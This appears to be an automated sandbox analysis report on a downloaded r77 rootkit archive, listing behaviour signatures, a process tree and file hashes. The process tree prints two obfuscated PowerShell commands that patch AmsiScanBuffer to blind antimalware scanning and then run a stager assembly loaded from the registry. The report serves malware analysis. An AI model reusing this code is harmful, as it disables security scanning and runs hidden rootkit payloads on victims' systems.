Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
960s -
max time network
965s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
04/06/2024, 15:37
General
-
Target
https://gofile.io/d/fUP0xm
Malware Config
Signatures
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 2 IoCs
-
Drops file in System32 directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of FindShellTrayWindow 39 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/fUP0xm1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffafda846f8,0x7ffafda84708,0x7ffafda847182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2464 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4740 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5441416436177904795,734462002321406655,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2452 /prefetch:22⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\r77-rootkit-master\" -spe -an -ai#7zMap1470:98:7zEvent81801⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\TestConsole\bin\Debug\TestConsole.exe"C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\TestConsole\bin\Debug\TestConsole.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\$77-Example.exe"C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\$77-Example.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\Install.exe"C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\Install.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uQLkVnmKfsCY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FIphCoGYrTCgoA,[Parameter(Position=1)][Type]$iWJxjFYMPA)$YnYkxyoxzap=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'ec'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+'C'+'l'+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'las'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$YnYkxyoxzap.DefineConstructor(''+'R'+'TS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+'e'+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+'yS'+'i'+'g'+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$FIphCoGYrTCgoA).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$YnYkxyoxzap.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'H'+'i'+'d'+''+[Char](101)+''+'B'+''+'y'+'Si'+'g'+''+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+'l',$iWJxjFYMPA,$FIphCoGYrTCgoA).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'ed');Write-Output $YnYkxyoxzap.CreateType();}$yJIVepzaIzkOc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+'f'+''+'e'+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+'o'+''+'d'+''+'s'+'');$cgsoQYHzpAAPui=$yJIVepzaIzkOc.GetMethod('Get'+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HhCMOoJCjnRGdWKdtss=uQLkVnmKfsCY @([String])([IntPtr]);$DdGmrFECyJSuZoFLmvHYjH=uQLkVnmKfsCY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SkYWkKLoHxb=$yJIVepzaIzkOc.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'Ha'+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$KUtKysfEAPCMIQ=$cgsoQYHzpAAPui.Invoke($Null,@([Object]$SkYWkKLoHxb,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'dLi'+[Char](98)+''+'r'+''+[Char](97)+'ry'+'A'+'')));$qNWLXsWPPdKJzniKc=$cgsoQYHzpAAPui.Invoke($Null,@([Object]$SkYWkKLoHxb,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$seFvPxs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KUtKysfEAPCMIQ,$HhCMOoJCjnRGdWKdtss).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'ll');$KcGMZFRBbPFxbTOmX=$cgsoQYHzpAAPui.Invoke($Null,@([Object]$seFvPxs,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+''+[Char](114)+'')));$QhLlhwiHNL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNWLXsWPPdKJzniKc,$DdGmrFECyJSuZoFLmvHYjH).Invoke($KcGMZFRBbPFxbTOmX,[uint32]8,4,[ref]$QhLlhwiHNL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KcGMZFRBbPFxbTOmX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNWLXsWPPdKJzniKc,$DdGmrFECyJSuZoFLmvHYjH).Invoke($KcGMZFRBbPFxbTOmX,[uint32]8,0x20,[ref]$QhLlhwiHNL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\Install.exe"C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\Install.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XwiawyDSlkcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wkYQkciPXjkfus,[Parameter(Position=1)][Type]$nqqssuvCgH)$DsSdBaZOIwZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+'e'+'d'+'D'+'ele'+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+'mo'+[Char](114)+'y'+[Char](77)+'od'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+'u'+'t'+''+'o'+'Cl'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$DsSdBaZOIwZ.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+'p'+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+',H'+[Char](105)+'de'+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wkYQkciPXjkfus).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$DsSdBaZOIwZ.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+'ke',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+'i'+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$nqqssuvCgH,$wkYQkciPXjkfus).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+'a'+''+'g'+''+'e'+''+'d'+'');Write-Output $DsSdBaZOIwZ.CreateType();}$lnUCAtECAbtqT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+'2'+[Char](46)+'U'+[Char](110)+''+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+'t'+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+'ods');$dccLWozxKiaZcQ=$lnUCAtECAbtqT.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+'e'+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$danWcampGuObWdkOAaD=XwiawyDSlkcg @([String])([IntPtr]);$uxbrFCUhItyjlWrQuWbwBT=XwiawyDSlkcg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bAJjeZnDWzo=$lnUCAtECAbtqT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rn'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+'d'+'l'+'l')));$wXTmLEKecWVdJj=$dccLWozxKiaZcQ.Invoke($Null,@([Object]$bAJjeZnDWzo,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'yA')));$gcgtqUuQVXXUBGfPh=$dccLWozxKiaZcQ.Invoke($Null,@([Object]$bAJjeZnDWzo,[Object]('V'+[Char](105)+''+[Char](114)+'tua'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$dfRHaGu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wXTmLEKecWVdJj,$danWcampGuObWdkOAaD).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$BNjEqvvVhEZtcXdvh=$dccLWozxKiaZcQ.Invoke($Null,@([Object]$dfRHaGu,[Object](''+[Char](65)+''+'m'+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+'anB'+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$ExuWdMbaSg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gcgtqUuQVXXUBGfPh,$uxbrFCUhItyjlWrQuWbwBT).Invoke($BNjEqvvVhEZtcXdvh,[uint32]8,4,[ref]$ExuWdMbaSg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BNjEqvvVhEZtcXdvh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gcgtqUuQVXXUBGfPh,$uxbrFCUhItyjlWrQuWbwBT).Invoke($BNjEqvvVhEZtcXdvh,[uint32]8,0x20,[ref]$ExuWdMbaSg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+[Char](116)+''+'a'+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\Uninstall.exe"C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\Uninstall.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\DMYoJiqM.exe"C:\Users\Admin\AppData\Local\Temp\DMYoJiqM.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\TestConsole.exe"C:\Users\Admin\Downloads\r77-rootkit-master\r77-rootkit-master\$Build\TestConsole.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57629d10a13abec85ecd03d924611305a
SHA1a5f5d67a78c8f63cbdcf13a864d48eda121bb10f
SHA256ea77a0f8dd1559685a328eb2aec0986349fb80f8bf81da6cd972964aafbc051b
SHA512eace0746ab5b275a7a6285b4dccb6528eb06066e891b7c8f707acc2a98a4a082a0e23be89363c616cce314bb48fc2589f5240db72837b0c5461910d66e12bf1c
-
Filesize
152B
MD54f7152bc5a1a715ef481e37d1c791959
SHA1c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7
SHA256704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc
SHA5122e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c
-
Filesize
152B
MD5ea98e583ad99df195d29aa066204ab56
SHA1f89398664af0179641aa0138b337097b617cb2db
SHA256a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6
